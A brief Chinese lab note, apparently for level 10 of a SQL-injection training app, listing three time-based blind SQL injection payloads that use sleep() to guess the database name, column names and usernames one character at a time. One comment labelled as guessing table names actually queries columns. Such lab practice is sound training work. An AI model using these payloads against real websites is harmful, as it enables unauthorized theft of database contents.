第十关的步骤与第九关相同
可以查看之前的第九关打法
//猜库名
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0)--+
//猜表名
?id=1' and if ((ascii(substr((select column_name from information_schema.columns where table_schema ='security' limit 3,1),1,1))=114),sleep(2),0)--+
//猜数据
?id=1' and if ((ascii(substr((select username from users limit 5,1),3,1))=112),sleep(2),0)--+